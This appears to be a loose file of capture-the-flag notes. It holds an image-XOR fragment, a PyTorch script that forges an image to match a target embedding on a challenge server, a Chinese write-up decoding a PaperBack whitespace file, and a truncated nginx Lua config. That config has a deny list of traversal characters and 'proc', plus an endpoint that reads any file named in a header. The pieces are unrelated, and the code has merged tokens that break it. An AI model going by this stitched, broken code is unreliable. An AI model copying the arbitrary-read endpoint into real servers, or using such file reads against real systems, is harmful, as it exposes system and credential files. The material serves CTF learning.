# 示例用法 if __name__ == "__main__": xor_images('/Volumes/[C] Windows 11/Downloads/C!_Downloads_stream2.webp!stream1.webp', '/Volumes/[C] Windows 11/Downloads/stream2.webp', '/Users/kakeru/Downloads/a.png')
import torch from torchvision.models import shufflenet_v2_x1_0, ShuffleNet_V2_X1_0_Weights from PIL import Image import torchvision.transforms as transforms import json
print("Step 1: Setting up the model and target embedding...")
# --- This part must EXACTLY match the server's setup --- # 1.1 Load the same pre-trained model model = shufflenet_v2_x1_0(weights=ShuffleNet_V2_X1_0_Weights.IMAGENET1K_V1) model.fc = torch.nn.Identity() # Turn it into a feature extractor model.eval() # Set it to evaluation mode
# 1.2 The target embedding vector from the problem description target_embedding_list = [0.01141324918717146, 0.05113353952765465, ... , 0.03890109062194824] # Paste the full list here target_embedding = torch.tensor(target_embedding_list, dtype=torch.float32).unsqueeze(0)
# --- Optimization Setup --- # 2.1 Start with a random image (a tensor of random values) # The model expects a 3-channel (RGB) image. Size doesn't matter too much, 224x224 is standard. generated_image = torch.randn(1, 3, 224, 224, requires_grad=True)
# 2.2 Set up the optimizer. Adam is a good choice. # It will update the pixels of `generated_image`. optimizer = torch.optim.Adam([generated_image], lr=0.01)
# 2.3 Define the loss function (Mean Squared Error) loss_fn = torch.nn.MSELoss()
print("\nStep 2: Starting the optimization process to generate the image...") # --- The Main Loop --- num_steps = 1000# More steps can lead to better results for i inrange(num_steps): # 3.1 Get the embedding of our current generated image current_embedding = model(generated_image)
# 3.2 Calculate the loss loss = loss_fn(current_embedding, target_embedding)
# 3.3 Backpropagation optimizer.zero_grad() # Clear previous gradients loss.backward() # Calculate new gradients optimizer.step() # Update the image pixels
# 3.4 Clamp the image values to be in a valid range [0, 1] with torch.no_grad(): generated_image.clamp_(0, 1)
if (i + 1) % 100 == 0: print(f"Step {i+1}/{num_steps}, Loss: {loss.item():.10f}")
# --- Save the Result --- print("\nStep 3: Saving the generated image to 'generated_image.png'...")
# Convert the final tensor to a PIL image and save it final_image_tensor = generated_image.squeeze(0) to_pil = transforms.ToPILImage() final_image = to_pil(final_image_tensor) final_image.save("generated_image.png")
print("✅ Done! Submit 'generated_image.png' to the server.")
PaperBack
这题很有意思,跟着wp复现的 题目描述:Someone thought paper could replace a CD. Turns out… they weren’t entirely wrong. Can you read between the dots? Btw, I really like OllyDbg. 搜索PaperBack,知道这是一种存储数据的方式 下载这个文件,扫描不冒泡得到一个ws文件,放到cyberchef中,转成hex 这里一共就20 09 0d 0a 这几种字符 0d0a又是对应着\r\n 把它们换成换行 接下来是最妙的一步,把单行出现的09忽略,然后把20对应0,19对应1 还有wp中没说的,把每行的最后8位提取出来,因为这样才是有意义的字符
location /download { access_by_lua_block { local blacklist = {"%.", "/", ";", "flag", "proc"} local args = ngx.req.get_uri_args() for k, v in pairs(args) do for _, b in ipairs(blacklist) do if string.find(v, b) then ngx.exit(403) end end end }
body_filter_by_lua_block { local blacklist = {"flag", "l3hsec", "l3hctf", "password", "secret", "confidential"} for _, b inipairs(blacklist) do ifstring.find(ngx.arg[1], b) then ngx.arg[1] = string.rep("*", string.len(ngx.arg[1])) end end }
location /read_anywhere { access_by_lua_block { if ngx.var.http_x_gateway_password ~= password then ngx.say("go find the password first!") ngx.exit(403) end } content_by_lua_block { local f = io.open(ngx.var.http_x_gateway_filename, "r") if not f then ngx.exit(404) end